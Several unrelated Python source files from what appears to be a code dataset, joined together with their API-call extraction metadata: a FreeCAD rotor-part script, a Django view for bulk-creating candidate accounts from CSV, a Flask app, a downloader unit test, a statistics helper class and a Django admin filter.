'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (2367, 2369), False, 'import mock\n'), ((5322, 5338), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (5336, 5338), False, 'import mock\n'), ((6294, 6310), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (6308, 6310), False, 'import mock\n'), ((7641, 7657), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (7655, 7657), False, 'import mock\n'), ((1927, 1955), 'catatom2osm.geo.geometry.Geometry.get_multipolygon', 'Geometry.get_multipolygon', (['p'], {}), '(p)\n', (1952, 1955), False, 'from catatom2osm.geo.geometry import Geometry\n')]
|
import FreeCAD, Part, Drawing, math, Mesh, importDXF
# Active FreeCAD document (None when the script runs in a fresh session)
# and the name used when a new document has to be created below.
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rotor"
def clear_doc():
    """Remove every object from the active document.

    Iterates over a snapshot (``list(...)``) of ``DOC.Objects`` because
    ``removeObject`` mutates the collection; deleting objects while
    iterating the live sequence can skip entries.
    """
    for obj in list(DOC.Objects):
        DOC.removeObject(obj.Name)
def setview():
    """Fit the camera to the model and switch to an axonometric view."""
    gui = FreeCAD.Gui
    gui.SendMsgToActiveView("ViewFit")
    gui.activeDocument().activeView().viewAxometric()
# Ensure there is an active document: create one on a fresh session,
# otherwise wipe the existing one so the script is re-runnable.
if DOC is None:
    FreeCAD.newDocument(DOC_NAME)
    FreeCAD.setActiveDocument(DOC_NAME)
    DOC = FreeCAD.activeDocument()
else:
    clear_doc()
# EPS= tolerance to use to cut the parts
# NOTE(review): EPS / EPS_C are not used anywhere in this script —
# presumably kept for cuts added later; confirm before removing.
EPS = 0.10
EPS_C = EPS * (-0.5)
maximal_diameter = 100  # overall rotor diameter in mm
# part_rotor: base disc, radius = max/2 minus three 5 mm rims, 1 mm thick
part_rotor = Part.makeCylinder(maximal_diameter/2 - 5 - 5 - 5, 1)
# part_rotor cut by cylinder_1 (central shaft hole, r = 2.5 mm)
cylinder_1 = Part.makeCylinder(2.5, 1)
part_rotor = part_rotor.cut(cylinder_1)
# holes for fixing the rotors: two r=2.5 holes, 180 deg apart, at r=15
degre = 180
for i in range(int(360/degre)):
    radius = 2.5 + 10 + 2.5
    alpha=(i*degre*math.pi)/180  # hole angle in radians
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(2.5, 1)
    hole.translate(hole_vector)
    part_rotor = part_rotor.cut(hole)
# holes for fixing the wires: twelve r=6.5 holes, 30 deg apart, on the rim
degre = 30
for i in range(int(360/degre)):
    radius = maximal_diameter/2 - 5 - 5 - 5
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(6.5, 1)
    hole.translate(hole_vector)
    part_rotor = part_rotor.cut(hole)
# Add the finished shape to the document and export it as STL and DXF.
Part.show(part_rotor)
DOC.recompute()
__objs__ = []
__objs__.append(FreeCAD.getDocument("part_rotor").getObject("Shape"))
stl_file = u"part_rotor.stl"
Mesh.export(__objs__, stl_file)
dxf_file = u"part_rotor.dxf"
importDXF.export(__objs__, dxf_file)
setview()
|
[
"Mesh.export",
"FreeCAD.getDocument",
"FreeCAD.newDocument",
"importDXF.export",
"math.sin",
"FreeCAD.Gui.SendMsgToActiveView",
"FreeCAD.setActiveDocument",
"math.cos",
"FreeCAD.Gui.activeDocument",
"FreeCAD.activeDocument",
"Part.show",
"Part.makeCylinder"
] |
[((60, 84), 'FreeCAD.activeDocument', 'FreeCAD.activeDocument', ([], {}), '()\n', (82, 84), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((670, 724), 'Part.makeCylinder', 'Part.makeCylinder', (['(maximal_diameter / 2 - 5 - 5 - 5)', '(1)'], {}), '(maximal_diameter / 2 - 5 - 5 - 5, 1)\n', (687, 724), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((768, 793), 'Part.makeCylinder', 'Part.makeCylinder', (['(2.5)', '(1)'], {}), '(2.5, 1)\n', (785, 793), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1501, 1522), 'Part.show', 'Part.show', (['part_rotor'], {}), '(part_rotor)\n', (1510, 1522), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1657, 1688), 'Mesh.export', 'Mesh.export', (['__objs__', 'stl_file'], {}), '(__objs__, stl_file)\n', (1668, 1688), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1720, 1756), 'importDXF.export', 'importDXF.export', (['__objs__', 'dxf_file'], {}), '(__objs__, dxf_file)\n', (1736, 1756), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((291, 333), 'FreeCAD.Gui.SendMsgToActiveView', 'FreeCAD.Gui.SendMsgToActiveView', (['"""ViewFit"""'], {}), "('ViewFit')\n", (322, 333), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((418, 447), 'FreeCAD.newDocument', 'FreeCAD.newDocument', (['DOC_NAME'], {}), '(DOC_NAME)\n', (437, 447), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((452, 487), 'FreeCAD.setActiveDocument', 'FreeCAD.setActiveDocument', (['DOC_NAME'], {}), '(DOC_NAME)\n', (477, 487), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((498, 522), 'FreeCAD.activeDocument', 'FreeCAD.activeDocument', ([], {}), '()\n', (520, 522), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1064, 1089), 'Part.makeCylinder', 'Part.makeCylinder', (['(2.5)', '(1)'], {}), '(2.5, 1)\n', (1081, 1089), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1404, 
1429), 'Part.makeCylinder', 'Part.makeCylinder', (['(6.5)', '(1)'], {}), '(6.5, 1)\n', (1421, 1429), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1009, 1024), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (1017, 1024), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1033, 1048), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (1041, 1048), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1349, 1364), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (1357, 1364), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1373, 1388), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (1381, 1388), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((1572, 1605), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""part_rotor"""'], {}), "('part_rotor')\n", (1591, 1605), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n'), ((338, 366), 'FreeCAD.Gui.activeDocument', 'FreeCAD.Gui.activeDocument', ([], {}), '()\n', (364, 366), False, 'import FreeCAD, Part, Drawing, math, Mesh, importDXF\n')]
|
import csv
from collections import OrderedDict
import threading
import time
from typing import Tuple
from django.http import Http404, JsonResponse
from django.shortcuts import render
from django.conf import settings
from django.contrib.auth.models import BaseUserManager, Group, User
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from hknweb.thread.models import ThreadTask
from hknweb.utils import login_and_permission, get_rand_photo
from hknweb.models import Profile
from hknweb.views.users import get_current_cand_semester
from hknweb.candidate.constants import (
ATTR,
CandidateDTO,
DEFAULT_RANDOM_PASSWORD_LENGTH,
)
@login_and_permission("auth.add_user")
def create_candidates_view(request):
    """Render the bulk candidate-creation page.

    The page posts a CSV of candidate information to ``add_cands``,
    which performs the actual account provisioning.
    """
    template = "candidate/create_candidates.html"
    return render(request, template)
@login_and_permission("auth.add_user")
def add_cands(request):
    """Validate the uploaded CSV and spawn the provisioning thread.

    Returns a JSON payload with ``success``, the task ``id`` to poll
    (``-1`` when nothing was started), and a human-readable ``message``.
    """
    if request.method != ATTR.POST:
        raise Http404()

    uploaded = request.FILES.get(ATTR.CAND_CSV, None)
    if uploaded is None:
        payload = {
            "success": False,
            "id": -1,
            "message": "No file detected (can be internal error)",
        }
        return JsonResponse(payload)
    if not uploaded.name.endswith(ATTR.CSV_ENDING):
        payload = {"success": False, "id": -1, "message": "Please input a csv file!"}
        return JsonResponse(payload)

    # Decode once; a second DictReader pass over the cached lines gives
    # the row total without consuming the reader handed to the thread.
    lines = uploaded.read().decode(ATTR.UTF8SIG).splitlines()
    reader = csv.DictReader(lines)
    row_total = sum(1 for _ in csv.DictReader(lines))
    login_link = request.build_absolute_uri("/accounts/login/")
    task_id = spawn_threaded_add_cands_and_email(reader, login_link, row_total)
    return JsonResponse({"success": True, "id": task_id, "message": ""})
@login_and_permission("auth.add_user")
def check_mass_candidate_status(request, id):
    """Return the current state of a background provisioning task as JSON."""
    task = ThreadTask.objects.get(pk=id)
    status = {
        "progress": task.progress,
        "message": task.message,
        "is_successful": task.is_successful,
        "is_done": task.is_done,
    }
    return JsonResponse(status)
NO_ACTION_PLS_FIX = "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
def spawn_threaded_add_cands_and_email(cand_csv, website_login_link, num_rows):
    """Start a background thread that provisions candidates and emails them.

    A ThreadTask row is persisted first so the caller can poll progress;
    its id is returned.
    """
    tracker = ThreadTask()
    tracker.save()
    worker = threading.Thread(
        target=threaded_add_cands_and_email,
        args=[cand_csv, num_rows, website_login_link, tracker],
    )
    tracker.startThread(worker)
    return tracker.id
def threaded_add_cands_and_email(cand_csv, num_rows, website_login_link, task):
    """Thread entry point: run the provisioning job and record the outcome.

    Any uncaught exception is converted into a failed task so the polling
    endpoint always observes a terminal state.
    """
    try:
        ok, message = add_cands_and_email(cand_csv, num_rows, website_login_link, task)
    except Exception as e:
        ok = False
        message = str(e)
    task.message = message
    if ok:
        task.complete()
    else:
        task.failure()
    task.progress = 100
    task.save()
def check_duplicates(
    candidatedto: "CandidateDTO",
    row: OrderedDict,
    email_set: set,
    username_set: set,
    i: int,
) -> Tuple[bool, str]:
    """Check a parsed CSV row for a duplicate email or username.

    Duplicates are detected both within the CSV itself (``email_set`` /
    ``username_set`` accumulate previously seen rows) and against
    existing User accounts in the database.

    Returns ``(True, error_message)`` on the first duplicate found,
    ``(False, "")`` when the row is clean.
    """
    no_action = (
        "No candidate account actions have been taken, "
        "so re-upload the entire file after fixing the errors."
    )

    def _error(base: str) -> Tuple[bool, str]:
        # Every duplicate error carries the same remediation advice plus
        # the offending row (1-indexed) for easy lookup in the CSV.
        return True, "{} {} Error Row Information at row {}: {}.".format(
            base, no_action, i + 1, row
        )

    # Duplicate email: repeated within the CSV, or already registered.
    if candidatedto.email in email_set:
        return _error(
            "Duplicate email {} in the Candidate data.".format(candidatedto.email)
        )
    if User.objects.filter(email=candidatedto.email).count() > 0:
        return _error(
            "Account with email {} already exists.".format(candidatedto.email)
        )

    # Duplicate username: same two sources.
    if candidatedto.username in username_set:
        return _error(
            "Duplicate username {} in the Candidate data.".format(candidatedto.username)
        )
    if User.objects.filter(username=candidatedto.username).count() > 0:
        return _error(
            "Account of username {} already exists.".format(candidatedto.username)
        )

    return False, ""
def add_cands_and_email(cand_csv, num_rows, website_login_link, task=None):
    """Create candidate accounts from parsed CSV rows and email credentials.

    Two phases, weighted 75%/25% on the progress bar: (1) validate every
    row and build User objects in memory — any error aborts before any
    account is saved; (2) persist the accounts, attach profiles, and send
    each candidate a credentials email.

    Returns (True, success_message) or (False, error_message).
    """
    candidate_group = Group.objects.get(name=ATTR.CANDIDATE)
    progress_float = 0.0
    CAND_ACC_WEIGHT = 0.75  # share of progress for account validation/creation
    EMAIL_WEIGHT = 0.25  # share of progress for sending emails
    # Sanity check progress
    if task is not None:
        task.progress = 1.0
        task.save()
    # Pre-screen and validate data
    new_cand_list = []
    email_set = set()
    username_set = set()
    current_cand_semester = get_current_cand_semester()
    email_passwords = {}
    if current_cand_semester is None:
        error_msg = "Inform CompServ the following: Please add the current semester in CourseSemester."
        error_msg += " "
        error_msg += NO_ACTION_PLS_FIX
        return False, error_msg
    # Phase 1: validate every row and stage User objects without saving,
    # so a bad row leaves the database untouched.
    for i, row in enumerate(cand_csv):
        try:
            candidatedto = CandidateDTO(row)
        except AssertionError as e:
            error_msg = "Invalid CSV format. Check that your columns are correctly labeled, there are NO blank rows, and filled out for each row."
            error_msg += " "
            error_msg += NO_ACTION_PLS_FIX
            error_msg += " "
            error_msg += "Candidate error message: {}.".format(e)
            error_msg += " "
            error_msg += "Row Information at row {}: {}.".format(i + 1, row)
            return False, error_msg
        # NOTE(review): called unbound with None standing in for the
        # manager instance — works because make_random_password does not
        # use self; confirm against the Django version in use.
        password = BaseUserManager.make_random_password(
            None, length=DEFAULT_RANDOM_PASSWORD_LENGTH
        )
        duplicate, error_msg = check_duplicates(
            candidatedto, row, email_set, username_set, i
        )
        if duplicate:
            return False, error_msg
        new_cand = User(
            username=candidatedto.username,
            email=candidatedto.email,
        )
        email_set.add(candidatedto.email)
        username_set.add(candidatedto.username)
        new_cand.first_name = candidatedto.first_name
        new_cand.last_name = candidatedto.last_name
        new_cand.set_password(password)
        new_cand_list.append(new_cand)
        email_passwords[new_cand.email] = password
        progress_float = CAND_ACC_WEIGHT * 100 * (i + 1) / num_rows
        if task is not None:
            task.progress = round(progress_float)
            task.save()
    # Reset to CAND_ACC_WEIGHT in case floating point errors
    progress_float = CAND_ACC_WEIGHT * 100
    if task is not None:
        task.progress = round(progress_float)
        task.save()
    num_of_accounts = len(email_set)
    if num_of_accounts != num_rows:
        error_msg = (
            "Internal Error: number of accounts ({}) != number of rows ({})".format(
                num_of_accounts, num_rows
            )
        )
        error_msg += " "
        error_msg += NO_ACTION_PLS_FIX
        return False, error_msg
    # Release the memory once done
    del email_set
    del username_set
    # Phase 2: persist accounts and send credential emails; individual
    # email failures are collected instead of aborting the whole batch.
    email_errors = []
    for i, new_cand in enumerate(new_cand_list):
        if i != 0 and i % 50 == 0:
            # Throttle every 50 accounts to avoid mail-rate limits.
            time.sleep(10)
        new_cand.save()
        candidate_group.user_set.add(new_cand)
        profile = Profile.objects.get(user=new_cand)
        profile.candidate_semester = current_cand_semester
        profile.save()
        subject = "[HKN] Candidate account"
        html_content = render_to_string(
            "candidate/new_candidate_account_email.html",
            {
                "subject": subject,
                "first_name": new_cand.first_name,
                "username": new_cand.username,
                "password": email_passwords[new_cand.email],
                "website_link": website_login_link,
                "img_link": get_rand_photo(),
            },
        )
        if settings.DEBUG:
            # In development: print instead of sending real mail.
            print("\n")
            print(new_cand.first_name, new_cand.username, new_cand.email)
            print(html_content)
            print("\n")
        else:
            msg = EmailMultiAlternatives(
                subject, subject, settings.NO_REPLY_EMAIL, [new_cand.email]
            )
            msg.attach_alternative(html_content, "text/html")
            try:
                msg.send()
            except Exception as e:
                email_errors.append((new_cand_list[i].email, str(e)))
        progress_float = (CAND_ACC_WEIGHT * 100) + (
            EMAIL_WEIGHT * 100 * (i + 1) / num_of_accounts
        )
        if task is not None:
            task.progress = round(progress_float)
            task.save()
    # If gone through everything and no errors
    if len(email_errors) > 0:
        error_msg = (
            "An error occured during the sending of emails. "
            + "Candidate Email and Error Messages: "
            + str(email_errors)
            + " --- "
            + "Inform CompServ of the errors, and inform the candidates "
            + "to access their accounts by resetting their password "
            + 'using "Forget your password?" in the Login page. '
            + "All {} candidates added!".format(num_of_accounts)
        )
        return False, error_msg
    else:
        return True, "Successfully added {} candidates!".format(num_of_accounts)
|
[
"hknweb.utils.login_and_permission",
"threading.Thread",
"hknweb.candidate.constants.CandidateDTO",
"hknweb.thread.models.ThreadTask.objects.get",
"csv.DictReader",
"django.contrib.auth.models.User",
"hknweb.utils.get_rand_photo",
"django.contrib.auth.models.User.objects.filter",
"django.http.JsonResponse",
"hknweb.views.users.get_current_cand_semester",
"django.contrib.auth.models.BaseUserManager.make_random_password",
"time.sleep",
"hknweb.thread.models.ThreadTask",
"django.core.mail.EmailMultiAlternatives",
"django.http.Http404",
"hknweb.models.Profile.objects.get",
"django.shortcuts.render",
"django.contrib.auth.models.Group.objects.get"
] |
[((698, 735), 'hknweb.utils.login_and_permission', 'login_and_permission', (['"""auth.add_user"""'], {}), "('auth.add_user')\n", (718, 735), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((967, 1004), 'hknweb.utils.login_and_permission', 'login_and_permission', (['"""auth.add_user"""'], {}), "('auth.add_user')\n", (987, 1004), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((1997, 2034), 'hknweb.utils.login_and_permission', 'login_and_permission', (['"""auth.add_user"""'], {}), "('auth.add_user')\n", (2017, 2034), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((912, 963), 'django.shortcuts.render', 'render', (['request', '"""candidate/create_candidates.html"""'], {}), "(request, 'candidate/create_candidates.html')\n", (918, 963), False, 'from django.shortcuts import render\n'), ((1651, 1688), 'csv.DictReader', 'csv.DictReader', (['decoded_cand_csv_file'], {}), '(decoded_cand_csv_file)\n', (1665, 1688), False, 'import csv\n'), ((1932, 1993), 'django.http.JsonResponse', 'JsonResponse', (["{'success': True, 'id': task_id, 'message': ''}"], {}), "({'success': True, 'id': task_id, 'message': ''})\n", (1944, 1993), False, 'from django.http import Http404, JsonResponse\n'), ((2092, 2121), 'hknweb.thread.models.ThreadTask.objects.get', 'ThreadTask.objects.get', ([], {'pk': 'id'}), '(pk=id)\n', (2114, 2121), False, 'from hknweb.thread.models import ThreadTask\n'), ((2133, 2265), 'django.http.JsonResponse', 'JsonResponse', (["{'progress': task.progress, 'message': task.message, 'is_successful': task.\n is_successful, 'is_done': task.is_done}"], {}), "({'progress': task.progress, 'message': task.message,\n 'is_successful': task.is_successful, 'is_done': task.is_done})\n", (2145, 2265), False, 'from django.http import Http404, JsonResponse\n'), ((2629, 2641), 'hknweb.thread.models.ThreadTask', 'ThreadTask', ([], {}), '()\n', (2639, 2641), False, 'from hknweb.thread.models import 
ThreadTask\n'), ((2666, 2776), 'threading.Thread', 'threading.Thread', ([], {'target': 'threaded_add_cands_and_email', 'args': '[cand_csv, num_rows, website_login_link, task]'}), '(target=threaded_add_cands_and_email, args=[cand_csv,\n num_rows, website_login_link, task])\n', (2682, 2776), False, 'import threading\n'), ((5074, 5112), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'name': 'ATTR.CANDIDATE'}), '(name=ATTR.CANDIDATE)\n', (5091, 5112), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((5425, 5452), 'hknweb.views.users.get_current_cand_semester', 'get_current_cand_semester', ([], {}), '()\n', (5450, 5452), False, 'from hknweb.views.users import get_current_cand_semester\n'), ((1079, 1088), 'django.http.Http404', 'Http404', ([], {}), '()\n', (1086, 1088), False, 'from django.http import Http404, JsonResponse\n'), ((1194, 1295), 'django.http.JsonResponse', 'JsonResponse', (["{'success': False, 'id': -1, 'message':\n 'No file detected (can be internal error)'}"], {}), "({'success': False, 'id': -1, 'message':\n 'No file detected (can be internal error)'})\n", (1206, 1295), False, 'from django.http import Http404, JsonResponse\n'), ((1449, 1534), 'django.http.JsonResponse', 'JsonResponse', (["{'success': False, 'id': -1, 'message': 'Please input a csv file!'}"], {}), "({'success': False, 'id': -1, 'message':\n 'Please input a csv file!'})\n", (1461, 1534), False, 'from django.http import Http404, JsonResponse\n'), ((6326, 6412), 'django.contrib.auth.models.BaseUserManager.make_random_password', 'BaseUserManager.make_random_password', (['None'], {'length': 'DEFAULT_RANDOM_PASSWORD_LENGTH'}), '(None, length=\n DEFAULT_RANDOM_PASSWORD_LENGTH)\n', (6362, 6412), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((6626, 6688), 'django.contrib.auth.models.User', 'User', ([], {'username': 'candidatedto.username', 'email': 'candidatedto.email'}), 
'(username=candidatedto.username, email=candidatedto.email)\n', (6630, 6688), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((8061, 8095), 'hknweb.models.Profile.objects.get', 'Profile.objects.get', ([], {'user': 'new_cand'}), '(user=new_cand)\n', (8080, 8095), False, 'from hknweb.models import Profile\n'), ((5796, 5813), 'hknweb.candidate.constants.CandidateDTO', 'CandidateDTO', (['row'], {}), '(row)\n', (5808, 5813), False, 'from hknweb.candidate.constants import ATTR, CandidateDTO, DEFAULT_RANDOM_PASSWORD_LENGTH\n'), ((7956, 7970), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (7966, 7970), False, 'import time\n'), ((8867, 8955), 'django.core.mail.EmailMultiAlternatives', 'EmailMultiAlternatives', (['subject', 'subject', 'settings.NO_REPLY_EMAIL', '[new_cand.email]'], {}), '(subject, subject, settings.NO_REPLY_EMAIL, [new_cand\n .email])\n', (8889, 8955), False, 'from django.core.mail import EmailMultiAlternatives\n'), ((1719, 1756), 'csv.DictReader', 'csv.DictReader', (['decoded_cand_csv_file'], {}), '(decoded_cand_csv_file)\n', (1733, 1756), False, 'import csv\n'), ((8611, 8627), 'hknweb.utils.get_rand_photo', 'get_rand_photo', ([], {}), '()\n', (8625, 8627), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((3515, 3560), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'email': 'candidatedto.email'}), '(email=candidatedto.email)\n', (3534, 3560), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((4296, 4347), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'candidatedto.username'}), '(username=candidatedto.username)\n', (4315, 4347), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n')]
|
import datetime
from flask import Flask, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from app.extensions.db import db
# from app.models import User
# Module-level Flask application; settings come from the project-root
# `config` module.
app = Flask(__name__)
app.config.from_object('config')
# Bind the shared SQLAlchemy instance to this app.
db.init_app(app)
# user_manager = UserManager(app, db, User)
# login_manager = LoginManager()
# login_manager.login_view = 'home.login'
# login_manager.init_app(app)
# QRcode(app, mode="google")
# @login_manager.user_loader
# def load_user(user_id):
# return User.query.get(user_id)
#
# @login_manager.unauthorized_handler
# def handle_needs_login():
# return redirect(url_for('home.login', msg="You have to be logged in to access this page."))
@app.context_processor
def inject_today_date():
    """Expose today's date to every template as ``current_date``."""
    today = datetime.date.today()
    return {'current_date': today}
|
[
"flask.Flask",
"app.extensions.db.db.init_app",
"datetime.date.today"
] |
[((170, 185), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (175, 185), False, 'from flask import Flask, redirect, url_for\n'), ((219, 235), 'app.extensions.db.db.init_app', 'db.init_app', (['app'], {}), '(app)\n', (230, 235), False, 'from app.extensions.db import db\n'), ((750, 771), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (769, 771), False, 'import datetime\n')]
|
from contextlib import closing
from downloader import AttachmentDownloader
import unittest
import shelve
import os.path
class TestOpportunityDownloader(unittest.TestCase):
    """Tests for AttachmentDownloader directory handling.

    setUp seeds a shelve database ('test_attach') with two solicitation
    numbers mapping to attachment metadata; tests exercise the
    per-solicitation download-directory helpers against it.
    """

    def setUp(self):
        # Attachment metadata keyed by solicitation number (solnbr).
        self.test_data = {
            'FA4626-14-R-0011': [
                {
                    'desc': 'Solicitation',
                    'filename': 'Solicitation.doc',
                    'url': 'https://www.fbo.gov/utils/view?id=46b7d20b80ba577b5e4dd10b1561b247'
                },
                {
                    'desc': 'Attch 1 Specifications',
                    'filename': 'Attch_1_Specifications.zip',
                    'url': 'https://www.fbo.gov/utils/view?id=f08375882eee4900f88a748fb8a941c7'
                },
                {
                    'desc': 'Attch 2 Material Submittal',
                    'filename': 'Attch_2_Submittal_Schedule.pdf',
                    'url': 'https://www.fbo.gov/utils/view?id=6b5544a2b5f254ae1dcfaea41f155960'
                }
            ],
            'FA-FOO-BAR-BAZ': [
                {
                    'desc': 'Attch 3 Schedule of Drawings',
                    'filename': 'Attch_3_Schedule_of_Drawings.pdf',
                    'url': 'https://www.fbo.gov/utils/view?id=9e6640c9840978099dbe08351d0802bf'
                },
                {
                    'desc': 'Attch 4 Drawings',
                    'filename': 'Attch_4_Drawings.zip',
                    'url': 'https://www.fbo.gov/utils/view?id=58e041568e210a73884254db1c069855'
                },
                {
                    'desc': 'Attch 5 Wage Determination',
                    'filename': 'Attch_5_Wage_Determination.docx',
                    'url': 'https://www.fbo.gov/utils/view?id=7301f9274d34ebbf3ec3ff8df04968e4'
                },
                {
                    'desc': 'Attch 6 Base Entry Policy',
                    'filename': 'Attch_6_Base_Entry_Policy_Letter.pdf',
                    'url': 'https://www.fbo.gov/utils/view?id=b4e13ed9cdeb5eec3822465565810457'
                }
            ]
        }
        # Persist the fixture into the shelf the downloader reads from;
        # closing() guarantees the shelf is flushed even on error.
        with closing(shelve.open('test_attach')) as db:
            for key in self.test_data:
                db[key] = self.test_data[key]

    def test_constructs_solnbr_download_directory_name(self):
        # Directory path is <dl_dir>/<solicitation number>.
        downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
        self.assertEqual(downloader.dir_for_solnbr('FA-FOO-BAR-BAZ'), 'py_test_dls/FA-FOO-BAR-BAZ')

    def test_creates_solnbr_download_directory(self):
        solnbr = 'FA-FOO-BAR-BAZ'
        downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
        dirpath = downloader.dir_for_solnbr(solnbr)
        downloader.create_dir_by_solnbr(solnbr)
        self.assertTrue(os.path.isdir(dirpath))
        # clean up
        os.rmdir(dirpath)
        self.assertFalse(os.path.isdir(dirpath))

    def test_downloader_does_not_care_if_directory_already_exists(self):
        # Creating the same directory twice must not raise.
        solnbr = 'FA-FOO-BAR-BAZ'
        downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
        downloader.create_dir_by_solnbr(solnbr)
        downloader.create_dir_by_solnbr(solnbr)
        # clean up
        os.rmdir(downloader.dir_for_solnbr(solnbr))
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
|
[
"unittest.main",
"downloader.AttachmentDownloader",
"shelve.open"
] |
[((3284, 3299), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3297, 3299), False, 'import unittest\n'), ((2307, 2370), 'downloader.AttachmentDownloader', 'AttachmentDownloader', ([], {'shelf': '"""test_attach"""', 'dl_dir': '"""py_test_dls"""'}), "(shelf='test_attach', dl_dir='py_test_dls')\n", (2327, 2370), False, 'from downloader import AttachmentDownloader\n'), ((2581, 2644), 'downloader.AttachmentDownloader', 'AttachmentDownloader', ([], {'shelf': '"""test_attach"""', 'dl_dir': '"""py_test_dls"""'}), "(shelf='test_attach', dl_dir='py_test_dls')\n", (2601, 2644), False, 'from downloader import AttachmentDownloader\n'), ((3018, 3081), 'downloader.AttachmentDownloader', 'AttachmentDownloader', ([], {'shelf': '"""test_attach"""', 'dl_dir': '"""py_test_dls"""'}), "(shelf='test_attach', dl_dir='py_test_dls')\n", (3038, 3081), False, 'from downloader import AttachmentDownloader\n'), ((2103, 2129), 'shelve.open', 'shelve.open', (['"""test_attach"""'], {}), "('test_attach')\n", (2114, 2129), False, 'import shelve\n')]
|
from statsAuxiliary.statsAuxiliary import StatsAuxiliary
from generalStatistics.generalMedian import general_median
from generalStatistics.generalMode import general_mode
from generalStatistics.generalMean import general_mean
class GeneralStatistics(StatsAuxiliary):
result = 0
def __init__(self):
super().__init__()
pass
def g_mean(self, a):
self.result = general_mean(a)
return self.result
def g_median(self, a):
self.result = general_median(a)
return self.result
def g_mode(self, a):
self.result = general_mode(a)
return self.result
|
[
"generalStatistics.generalMode.general_mode",
"generalStatistics.generalMedian.general_median",
"generalStatistics.generalMean.general_mean"
] |
[((397, 412), 'generalStatistics.generalMean.general_mean', 'general_mean', (['a'], {}), '(a)\n', (409, 412), False, 'from generalStatistics.generalMean import general_mean\n'), ((490, 507), 'generalStatistics.generalMedian.general_median', 'general_median', (['a'], {}), '(a)\n', (504, 507), False, 'from generalStatistics.generalMedian import general_median\n'), ((583, 598), 'generalStatistics.generalMode.general_mode', 'general_mode', (['a'], {}), '(a)\n', (595, 598), False, 'from generalStatistics.generalMode import general_mode\n')]
|
# -*- coding: utf-8 -*-
from django import forms
from django.contrib import admin
from django.utils.translation import gettext_lazy as _
from .models import Address
from .widgets import AddressWithMapWidget
class HasExceptionFilter(admin.SimpleListFilter):
title = _("exception")
parameter_name = "has_exception"
def lookups(self, request, model_admin):
return (
(1, _("Yes")),
(0, _("No")),
)
def queryset(self, request, queryset):
if self.value() is not None:
ids = Address.objects.values_list("pk", flat=True)
if self.value() == "1":
return queryset.filter(pk__in=ids)
elif self.value() == "0":
return queryset.exclude(pk__in=ids)
return queryset
class AddressAdmin(admin.ModelAdmin):
list_display = ["address", "computed_address", "latitude", "longitude", "has_exception"]
list_filter = [HasExceptionFilter]
search_fields = ["address"]
class form(forms.ModelForm):
class Meta:
widgets = {"address": AddressWithMapWidget({"class": "vTextField"})}
|
[
"django.utils.translation.gettext_lazy"
] |
[((273, 287), 'django.utils.translation.gettext_lazy', '_', (['"""exception"""'], {}), "('exception')\n", (274, 287), True, 'from django.utils.translation import gettext_lazy as _\n'), ((404, 412), 'django.utils.translation.gettext_lazy', '_', (['"""Yes"""'], {}), "('Yes')\n", (405, 412), True, 'from django.utils.translation import gettext_lazy as _\n'), ((431, 438), 'django.utils.translation.gettext_lazy', '_', (['"""No"""'], {}), "('No')\n", (432, 438), True, 'from django.utils.translation import gettext_lazy as _\n')]
|
from django.urls import path, include
urlpatterns = [
